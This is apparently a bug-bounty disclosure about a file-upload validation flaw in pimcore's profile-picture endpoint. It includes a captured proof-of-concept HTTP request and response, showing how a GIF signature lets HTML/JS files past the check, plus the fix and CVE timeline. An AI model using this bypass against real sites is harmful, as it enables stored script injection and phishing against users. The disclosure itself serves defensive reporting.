File Upload Type Validation Error in pimcore/pimcore


Reported on

Jan 17th 2023


The upload functionality for updating user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.

Proof of Concept

The following request was modified to allow uploading HTML file using a valid GIF signature, but can be modified to upload any kind of content-type:


Capture the Request of Updating Profile Picture

POST /admin/user/upload-current-user-image?id=2 HTTP/1.1
Cookie: pimcore_admin_sid=1; PHPSESSID=f1a6743af0c4aa2f43eb5a30c312c318; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NzM5MzE3NDQuOTQzMzQzLCJwdGciOnsiX20iOjEsIl9jIjoxNjczOTMxNTYxLCJfdSI6MTY3MzkzMTc0NCwidmk6c3J1IjpbN119LCJleHAiOjE2NzM5MzM1NDR9._aLiOrKEnfyCJ7sjp21XNezGvj93gf9OSpkS82KaSnI; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NzM5MzE3NDQuOTQzNDYyLCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MX0sIl9jIjoxNjczOTMxNTYxLCJfdSI6MTY3MzkzMTU2MX0sImV4cCI6MTcwNTQ2Nzc0NH0.I1O7KjEqpnL2j7xv8NUruiX3EA50KMiVFShELH1WPsE
Content-Length: 366
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0BPEuMmR4S3FotDc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Content-Disposition: form-data; name="csrfToken"

Content-Disposition: form-data; name="Filedata"; filename="111.txt"
Content-Type: text/plain



HTTP/1.1 200 OK
Date: Tue, 17 Jan 2023 05:04:54 GMT
Server: Apache/2.4.38 (Debian)
Strict-Transport-Security: max-age=63072000; preload
X-Powered-By: PHP/8.0.10
Cache-Control: max-age=-1358399094, must-revalidate, private
X-Powered-By: pimcore
Content-Language: en
Pragma: no-cache
Expires: Tue, 01 Jan 1980 00:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f1a6743af0c4aa2f43eb5a30c312c318; path=/; secure; HttpOnly; SameSite=strict
Strict-Transport-Security: max-age=63072000; preload
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Referrer-Policy: origin-when-cross-origin
X-Robots-Tag: noindex, noarchive, nosnippet
Connection: close
Content-Length: 16




This could allow an attacker to write custom pages, Those pages can contain phising html or even JS code that will be executed in the context of the active user browser.


We are processing your report and will contact the pimcore team within 24 hours. 2 months ago
We have contacted a member of the pimcore team and are waiting to hear back 2 months ago
pimcore/pimcore maintainer has acknowledged this report 2 months ago
2 months ago


@pimcore any update ??

Divesh Pahuja validated this vulnerability 2 months ago
ctflearner has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
JiaJia Ji marked this as fixed in 10.5.16 with commit 75a448 2 months ago
JiaJia Ji has been awarded the fix bounty
This vulnerability will not receive a CVE
JiaJia Ji published this vulnerability 2 months ago
2 months ago


@JiaJia Ji can you assign CVE for this

2 months ago


@Divesh Pahuja can you assign CVE for this

JiaJia Ji
2 months ago


@ctflearner CVE is under

Thank you again

2 months ago


Thanks for your Response . @JiaJia Ji is it possible that this CVE-2023-23937, reflect into my huntr-dev account by talking to admin ?

to join this conversation